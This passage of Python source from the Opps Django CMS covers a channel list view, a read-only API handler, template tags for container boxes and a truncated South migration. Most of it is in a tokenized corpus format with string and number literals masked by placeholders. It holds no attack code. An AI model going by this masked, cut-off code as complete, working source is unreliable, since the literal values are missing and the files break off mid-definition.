            if self.request.GET.get('<STR_LIT>') and self.__class__.__name__ not in settings.OPPS_PAGINATE_NOT_APP:
                templates.append('<STR_LIT>'.format(
                    domain_folder, self.channel.long_slug, list_fullname))
            templates.append('<STR_LIT>'.format(
                domain_folder, self.channel.long_slug, list_fullname))
            # Walk ancestors from nearest to root ([::-1] reverses the
            # root-first order returned by get_ancestors()).
            for t in self.channel.get_ancestors()[::-1]:
                templates.append('<STR_LIT>'.format(
                    domain_folder, t.long_slug, list_fullname))
                if self.request.GET.get('<STR_LIT>') and self.__class__.__name__ not in settings.OPPS_PAGINATE_NOT_APP:
                    templates.append('<STR_LIT>'.format(
                        domain_folder, t.long_slug, list_fullname))
        if self.request.GET.get('<STR_LIT>') and self.__class__.__name__ not in settings.OPPS_PAGINATE_NOT_APP:
            templates.append('<STR_LIT>'.format(domain_folder,
                                                 list_fullname))
        # Final fallback: the model's default list template.
        templates.append('<STR_LIT>'.format(
            self.model._meta.app_label,
            self.model._meta.module_name,
            list_name))
        return templates

    def get_template_names(self):
        # Delegate to get_template_list using the resolved domain folder.
        domain_folder = self.get_template_folder()
        template_list = self.get_template_list(domain_folder)
        return template_list

    def get_queryset(self):
        # Restrict the parent queryset to the current site's published,
        # currently-available entries.
        self.site = get_current_site(self.request)
        queryset = super(AlbumChannelList, self).get_queryset()
        filters = {}
        filters['<STR_LIT>'] = self.site.domain
        filters['<STR_LIT>'] = timezone.now()
        filters['<STR_LIT>'] = True
        filters['<STR_LIT>'] = True
        queryset = queryset.filter(**filters)
        # Fresh clone so callers do not share this result cache.
        return queryset._clone()
from django.utils import timezone

from opps.api import BaseHandler

from .models import Container, ContainerBox


class Handler(BaseHandler):
    """<STR_LIT>"""
    # Read-only API endpoint base class.
    allowed_methods = ('<STR_LIT:GET>',)

    def read(self, request):
        """Return published, currently-available objects matching the
        request's GET parameters, sliced by the handler's page/limit.

        Blacklisted fields (self.blackfield) are stripped from the
        client-supplied filters so they cannot be queried on.
        """
        filters = request.GET.dict()
        filters['<STR_LIT>'] = timezone.now()
        filters['<STR_LIT>'] = True
        # Fix: the original used a list comprehension purely for its
        # side effect; a plain loop states the intent directly.
        for blacklisted in self.blackfield:
            filters.pop(blacklisted, None)
        return self.model.objects.filter(
            **filters)[self._page(request):self._limit(request)]


class ContainerHandler(Handler):
    # Exposes Container objects through the generic read endpoint.
    model = Container


class ContainerBoxHandler(Handler):
    # Exposes ContainerBox objects with an explicit field whitelist.
    model = ContainerBox
    fields = (
        '<STR_LIT:name>',
        '<STR_LIT>',
        '<STR_LIT:title>',
        '<STR_LIT>',
        '<STR_LIT>',
        ('<STR_LIT>', ())
    )
    exclude = ['<STR_LIT>']
<s> from collections import Counter <EOL> import logging <EOL> from django import template <EOL> from django . conf import settings <EOL> from django . utils import timezone <EOL> from django . utils . safestring import mark_safe <EOL> from django . core . cache import cache <EOL> from django . contrib . sites . models import Site <EOL> from opps . channels . models import Channel <EOL> from opps . contrib . middleware . global_request import get_request <EOL> from opps . containers . models import Container , ContainerBox , Mirror <EOL> from magicdate import magicdate <EOL> register = template . Library ( ) <EOL> logger = logging . getLogger ( ) <EOL> @ register . assignment_tag <EOL> def get_tags_counter ( queryset = None , n = None ) : <EOL> if queryset is None : <EOL> queryset = Container . objects . all_published ( ) <EOL> counter = Counter ( ) <EOL> qs = queryset . filter ( tags__isnull = False ) . exclude ( tags = "<STR_LIT>" ) . order_by ( ) <EOL> print qs . count ( ) <EOL> for tags in qs . values_list ( "<STR_LIT>" , flat = True ) . distinct ( ) : <EOL> l = [ i . strip ( ) for i in tags . split ( "<STR_LIT:U+002C>" ) if i . strip ( ) ] <EOL> counter . update ( l ) <EOL> return counter . most_common ( n ) <EOL> @ register . filter <EOL> def values_list_flat ( queryset , field = '<STR_LIT>' ) : <EOL> return queryset . values_list ( field , flat = True ) <EOL> @ register . assignment_tag <EOL> def get_recommendations ( query_slice , child_class , container ) : <EOL> """<STR_LIT>""" <EOL> if not query_slice : <EOL> query_slice = "<STR_LIT::>" <EOL> bits = [ ] <EOL> for x in query_slice . split ( '<STR_LIT::>' ) : <EOL> if len ( x ) == <NUM_LIT:0> : <EOL> bits . append ( None ) <EOL> else : <EOL> bits . append ( int ( x ) ) <EOL> return container . recommendation ( child_class , bits ) <EOL> @ register . 
assignment_tag ( takes_context = True ) <EOL> def load_boxes ( context , slugs = None , ** filters ) : <EOL> if slugs : <EOL> filters [ '<STR_LIT>' ] = ordered_slugs = slugs . split ( '<STR_LIT:U+002C>' ) <EOL> request = context [ '<STR_LIT>' ] <EOL> current_site = getattr ( <EOL> request , <EOL> '<STR_LIT>' , <EOL> Site . objects . get ( pk = settings . SITE_ID ) <EOL> ) <EOL> filters [ '<STR_LIT>' ] = [ current_site ] <EOL> master_site = settings . OPPS_CONTAINERS_SITE_ID or <NUM_LIT:1> <EOL> if current_site . id != master_site : <EOL> filters [ '<STR_LIT>' ] . append ( master_site ) <EOL> filters [ '<STR_LIT>' ] = timezone . now ( ) <EOL> filters [ '<STR_LIT>' ] = True <EOL> boxes = ContainerBox . objects . filter ( ** filters ) . order_by ( '<STR_LIT>' ) <EOL> fallback = getattr ( settings , '<STR_LIT>' , False ) <EOL> exclude_ids = [ ] <EOL> if slugs : <EOL> def ob ( i , o = ordered_slugs ) : <EOL> return ( i . site_id != current_site , i . site_id , o . index ( i . slug ) ) <EOL> boxes = sorted ( boxes , key = ob , reverse = True ) <EOL> for box in boxes : <EOL> if box . queryset : <EOL> results = box . get_queryset ( exclude_ids = exclude_ids ) <EOL> else : <EOL> results = box . ordered_containers ( exclude_ids = exclude_ids ) <EOL> if box . queryset : <EOL> for i in results : <EOL> if i . pk not in exclude_ids and isinstance ( i , Container ) : <EOL> exclude_ids . append ( i . pk ) <EOL> elif fallback : <EOL> for i in results : <EOL> if i . container_id and i . container_id not in exclude_ids : <EOL> exclude_ids . append ( i . container_id ) <EOL> else : <EOL> for i in results : <EOL> if i . pk not in exclude_ids : <EOL> exclude_ids . append ( i . pk ) <EOL> results = { } <EOL> for box in boxes : <EOL> if box . slug not in results : <EOL> results [ box . slug ] = box <EOL> get_request ( ) . container_boxes = results <EOL> return results <EOL> @ register . 
simple_tag ( takes_context = True ) <EOL> def get_containerbox ( <EOL> context , slug , template_name = None , channel = None , ** extra_context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> current_site = getattr ( <EOL> request , <EOL> '<STR_LIT>' , <EOL> Site . objects . get ( pk = settings . SITE_ID ) <EOL> ) <EOL> is_mobile = getattr ( request , '<STR_LIT>' , False ) <EOL> cachekey = "<STR_LIT>" . format ( <EOL> slug , <EOL> template_name , <EOL> is_mobile , <EOL> current_site . id <EOL> ) <EOL> render = cache . get ( cachekey ) <EOL> if render : <EOL> return render <EOL> box = getattr ( get_request ( ) , '<STR_LIT>' , { } ) . get ( slug , None ) <EOL> if not box : <EOL> filters = { } <EOL> filters [ '<STR_LIT>' ] = current_site . id <EOL> filters [ '<STR_LIT>' ] = slug <EOL> filters [ '<STR_LIT>' ] = timezone . now ( ) <EOL> filters [ '<STR_LIT>' ] = True <EOL> if channel is not None : <EOL> filters [ '<STR_LIT>' ] = channel <EOL> master_site = settings . OPPS_CONTAINERS_SITE_ID or <NUM_LIT:1> <EOL> try : <EOL> box = ContainerBox . objects . get ( ** filters ) <EOL> except ContainerBox . DoesNotExist : <EOL> box = None <EOL> if current_site . id != master_site and not box or not getattr ( box , '<STR_LIT>' , False ) : <EOL> filters [ '<STR_LIT>' ] = master_site <EOL> try : <EOL> box = ContainerBox . objects . get ( ** filters ) <EOL> except ContainerBox . DoesNotExist : <EOL> box = None <EOL> if not box : <EOL> box = ContainerBox . objects . none ( ) <EOL> t = template . loader . get_template ( '<STR_LIT>' ) <EOL> if template_name : <EOL> t = template . loader . get_template ( template_name ) <EOL> context = { <EOL> '<STR_LIT>' : box , <EOL> '<STR_LIT>' : slug , <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : request <EOL> } <EOL> context . update ( extra_context ) <EOL> render = t . render ( template . Context ( context ) ) <EOL> cache . set ( cachekey , render , settings . OPPS_CACHE_EXPIRE ) <EOL> return render <EOL> @ register . 
simple_tag <EOL> def get_all_containerbox ( channel_long_slug = None , template_name = None ) : <EOL> """<STR_LIT>""" <EOL> cachekey = "<STR_LIT>" . format ( <EOL> channel_long_slug , <EOL> template_name ) <EOL> render = cache . get ( cachekey ) <EOL> if render : <EOL> return render <EOL> filters = { } <EOL> filters [ '<STR_LIT>' ] = timezone . now ( ) <EOL> filters [ '<STR_LIT>' ] = True <EOL> filters [ '<STR_LIT>' ] = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> filters [ '<STR_LIT>' ] = settings . OPPS_CONTAINERS_SITE_ID <EOL> boxes = ContainerBox . objects . filter ( ** filters ) <EOL> if channel_long_slug : <EOL> boxes = boxes . filter ( channel_long_slug = channel_long_slug ) <EOL> t = template . loader . get_template ( '<STR_LIT>' ) <EOL> if template_name : <EOL> t = template . loader . get_template ( template_name ) <EOL> render = t . render ( template . Context ( { '<STR_LIT>' : boxes } ) ) <EOL> cache . set ( cachekey , render , settings . OPPS_CACHE_EXPIRE ) <EOL> return render <EOL> @ register . simple_tag <EOL> def get_post_content ( post , template_name = '<STR_LIT>' , <EOL> content_field = '<STR_LIT:content>' , related_name = '<STR_LIT>' , <EOL> get_related = True , safe = True , divider = "<STR_LIT>" , <EOL> placeholder = settings . OPPS_RELATED_POSTS_PLACEHOLDER ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( post , content_field ) : <EOL> return None <EOL> content = getattr ( post , content_field , '<STR_LIT>' ) <EOL> content = content . replace ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> if not get_related : <EOL> return content <EOL> related_posts = getattr ( post , related_name , None ) <EOL> if not related_posts . exists ( ) : <EOL> return mark_safe ( content ) <EOL> t = template . loader . get_template ( template_name ) <EOL> related_rendered = t . render ( template . Context ( { <EOL> '<STR_LIT>' : post , related_name : related_posts } ) ) <EOL> if placeholder in content : <EOL> return mark_safe ( content . 
replace ( <EOL> placeholder , <EOL> related_rendered <EOL> ) ) <EOL> else : <EOL> return mark_safe ( content + divider + related_rendered ) <EOL> @ register . simple_tag <EOL> def get_url ( obj , http = False , target = None , url_only = False ) : <EOL> if not hasattr ( obj , '<STR_LIT>' ) : <EOL> return obj . get_absolute_url ( ) <EOL> try : <EOL> _url = obj . get_absolute_url ( ) <EOL> _target = target or '<STR_LIT>' <EOL> _is_link = obj . child_class == '<STR_LIT>' <EOL> if _is_link and not obj . link . is_local ( ) and not target : <EOL> _target = '<STR_LIT>' <EOL> if http : <EOL> _url = '<STR_LIT>' . format ( <EOL> obj . site , <EOL> obj . get_absolute_url ( ) ) <EOL> if url_only : <EOL> return _url <EOL> return '<STR_LIT>' . format ( _url , _target ) <EOL> except Exception as e : <EOL> logger . error ( "<STR_LIT>" . format ( e ) ) <EOL> return obj . get_absolute_url ( ) <EOL> @ register . assignment_tag <EOL> def get_containers_by ( limit = None , ** filters ) : <EOL> """<STR_LIT>""" <EOL> cachekey = u'<STR_LIT>' . format ( hash ( frozenset ( filters . items ( ) ) ) ) <EOL> _cache = cache . get ( cachekey ) <EOL> if _cache : <EOL> return _cache <EOL> site = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> site = settings . OPPS_CONTAINERS_SITE_ID <EOL> qs = Container . objects . all_published ( ) <EOL> qs = qs . filter ( site = site , ** filters ) <EOL> qs = qs [ : limit ] <EOL> containers = [ i for i in qs ] <EOL> cache . set ( cachekey , containers , settings . OPPS_CACHE_EXPIRE ) <EOL> return containers <EOL> @ register . assignment_tag <EOL> def filter_queryset_by ( queryset , ** filters ) : <EOL> """<STR_LIT>""" <EOL> if not getattr ( queryset , '<STR_LIT>' , False ) : <EOL> return queryset <EOL> cachekey = u'<STR_LIT>' . format ( hash ( unicode ( queryset . query ) ) ) <EOL> _cache = cache . get ( cachekey ) <EOL> if _cache : <EOL> return _cache <EOL> found_in_lookup = None <EOL> for key in filters . 
keys ( ) : <EOL> if '<STR_LIT>' in key : <EOL> found_in_lookup = key <EOL> if found_in_lookup : <EOL> filters [ found_in_lookup ] = filters [ found_in_lookup ] . split ( '<STR_LIT:U+002C>' ) <EOL> if not queryset . query . can_filter ( ) : <EOL> ids = [ i . id for i in queryset ] <EOL> queryset = queryset . model . objects . filter ( id__in = ids ) . filter ( ** filters ) <EOL> return queryset <EOL> containers = queryset . filter ( ** filters ) <EOL> cache . set ( cachekey , containers , settings . OPPS_CACHE_EXPIRE ) <EOL> return containers <EOL> @ register . assignment_tag <EOL> def exclude_queryset_by ( queryset , ** excludes ) : <EOL> """<STR_LIT>""" <EOL> if not getattr ( queryset , '<STR_LIT>' , False ) : <EOL> return queryset <EOL> cachekey = u'<STR_LIT>' . format ( hash ( unicode ( queryset . query ) ) ) <EOL> _cache = cache . get ( cachekey ) <EOL> if _cache : <EOL> return _cache <EOL> found_in_lookup = None <EOL> for key in excludes . keys ( ) : <EOL> if '<STR_LIT>' in key : <EOL> found_in_lookup = key <EOL> if found_in_lookup : <EOL> excludes [ found_in_lookup ] = excludes [ found_in_lookup ] . split ( '<STR_LIT:U+002C>' ) <EOL> if not queryset . query . can_filter ( ) : <EOL> ids = [ i . id for i in queryset ] <EOL> containers = queryset . model . objects . filter ( id__in = ids ) . exclude ( <EOL> ** excludes <EOL> ) <EOL> else : <EOL> containers = queryset . exclude ( ** excludes ) <EOL> if '<STR_LIT>' in excludes : <EOL> bad_child_class = excludes [ '<STR_LIT>' ] <EOL> mirrors = Mirror . objects . filter ( <EOL> container__child_class = bad_child_class <EOL> ) . values_list ( '<STR_LIT:id>' , flat = True ) <EOL> if mirrors : <EOL> containers = containers . exclude ( pk__in = mirrors ) <EOL> cache . set ( cachekey , containers , settings . OPPS_CACHE_EXPIRE ) <EOL> return containers <EOL> @ register . 
assignment_tag <EOL> def get_container_by_channel ( slug , number = <NUM_LIT:10> , depth = <NUM_LIT:1> , <EOL> include_children = True , ** kwargs ) : <EOL> box = None <EOL> magic_date = kwargs . pop ( '<STR_LIT>' , False ) <EOL> date = timezone . now ( ) <EOL> if magic_date : <EOL> try : <EOL> date = magicdate ( magic_date ) <EOL> except Exception : <EOL> pass <EOL> splited = dict ( [ <EOL> ( key , value . split ( '<STR_LIT:U+002C>' ) ) <EOL> for key , value <EOL> in kwargs . items ( ) <EOL> if key . endswith ( '<STR_LIT>' ) and type ( value ) is not list ] ) <EOL> kwargs . update ( splited ) <EOL> if include_children : <EOL> k = '<STR_LIT>' <EOL> kwargs [ k ] = cache . get ( <EOL> '<STR_LIT>' . format ( slug ) ) <EOL> if not kwargs [ k ] : <EOL> try : <EOL> channel = Channel . objects . get ( long_slug = slug ) <EOL> qs = channel . get_descendants ( include_self = True ) <EOL> qs = qs . filter ( level__lte = channel . level + depth ) <EOL> kwargs [ k ] = qs . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> cache . set ( <EOL> '<STR_LIT>' . format ( slug ) , <EOL> kwargs [ k ] , <EOL> settings . OPPS_CACHE_EXPIRE ) <EOL> except Channel . DoesNotExist : <EOL> kwargs [ k ] = [ ] <EOL> try : <EOL> kwargs [ '<STR_LIT>' ] = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> kwargs [ '<STR_LIT>' ] = settings . OPPS_CONTAINERS_SITE_ID <EOL> kwargs [ '<STR_LIT>' ] = include_children <EOL> kwargs [ '<STR_LIT>' ] = date <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> box = Container . objects . distinct ( ) . filter ( <EOL> ** kwargs ) . order_by ( '<STR_LIT>' ) [ : number ] <EOL> except : <EOL> pass <EOL> return box <EOL> @ register . assignment_tag <EOL> def get_containerbox_by ( ** filters ) : <EOL> """<STR_LIT>""" <EOL> site = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> site = settings . OPPS_CONTAINERS_SITE_ID <EOL> return ContainerBox . objects . 
filter ( site = site , <EOL> published = True , <EOL> date_available__lte = timezone . now ( ) , <EOL> ** filters ) <EOL> @ register . simple_tag ( takes_context = True ) <EOL> def get_containerbox_list ( context , slug , num = <NUM_LIT:0> , template_name = None ) : <EOL> """<STR_LIT>""" <EOL> request = context [ '<STR_LIT>' ] <EOL> cachekey = "<STR_LIT>" . format ( <EOL> slug , <EOL> template_name , <EOL> request . is_mobile , <EOL> ) <EOL> render = cache . get ( cachekey ) <EOL> if render : <EOL> return render <EOL> site = settings . SITE_ID <EOL> if settings . OPPS_CONTAINERS_SITE_ID : <EOL> site = settings . OPPS_CONTAINERS_SITE_ID <EOL> try : <EOL> box = ContainerBox . objects . filter ( <EOL> site = site , slug = slug , <EOL> date_available__lte = timezone . now ( ) , <EOL> published = True ) <EOL> if isinstance ( num , int ) and num > <NUM_LIT:0> and box : <EOL> list_box = box [ <NUM_LIT:0> ] . ordered_box_containers ( ) <EOL> box = [ list_box [ i : i + num ] for i in range ( <NUM_LIT:0> , len ( list_box ) , num ) ] <EOL> except ContainerBox . DoesNotExist : <EOL> box = None <EOL> t = template . loader . get_template ( '<STR_LIT>' ) <EOL> if template_name : <EOL> t = template . loader . get_template ( template_name ) <EOL> render = t . render ( template . Context ( { <EOL> '<STR_LIT>' : box , <EOL> '<STR_LIT>' : slug , <EOL> '<STR_LIT>' : context } <EOL> ) ) <EOL> cache . set ( cachekey , render , settings . OPPS_CACHE_EXPIRE ) <EOL> return render <EOL> @ register . assignment_tag <EOL> def get_custom_field_value ( obj , field_slug ) : <EOL> """<STR_LIT>""" <EOL> if not callable ( getattr ( obj , '<STR_LIT>' ) ) : <EOL> return None <EOL> if not obj . custom_fields ( ) : <EOL> return None <EOL> return obj . custom_fields ( ) . get ( field_slug ) <EOL> @ register . assignment_tag <EOL> def get_postrelated_by ( obj , ** filters ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( obj , '<STR_LIT>' , False ) : <EOL> cachekey = u'<STR_LIT>' . 
format ( <EOL> hash ( frozenset ( filters . items ( ) ) ) , obj . pk ) <EOL> _cache = cache . get ( cachekey ) <EOL> if _cache : <EOL> return _cache <EOL> queryset = obj . postrelated_post . filter ( post__pk = obj . pk ) <EOL> if '<STR_LIT>' in filters . keys ( ) : <EOL> del filters [ '<STR_LIT>' ] <EOL> containers = [ i . related for i in queryset . exclude ( ** filters ) <EOL> . order_by ( '<STR_LIT>' ) ] <EOL> else : <EOL> containers = [ i . related for i in queryset . filter ( ** filters ) <EOL> . order_by ( '<STR_LIT>' ) ] <EOL> cache . set ( cachekey , containers , settings . OPPS_CACHE_EXPIRE ) <EOL> return containers <EOL> return '<STR_LIT>' </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> from django . contrib . auth import get_user_model <EOL> User = get_user_model ( ) <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( u'<STR_LIT>' , ( <EOL> ( u'<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now = True , blank = True ) ) , <EOL> ( '<STR_LIT:user>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' % ( User . _meta . app_label , User . _meta . object_name ) ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:1> , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( db_index = True , max_length = <NUM_LIT:4> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( db_index = True , max_length = <NUM_LIT:100> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = datetime . datetime . now , null = True , db_index = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False , db_index = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT:action>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT:message>' , max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT:type>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT:10> ) ) , <EOL> ( '<STR_LIT:message>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ) ) <EOL> db . send_create_signal ( u'<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( u'<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' % ( User . _meta . app_label , User . _meta . 
module_name ) : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : User . __name__ } , <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> 
u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:to>' : u"<STR_LIT>" % ( User . _meta . app_label , User . _meta . object_name ) } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 
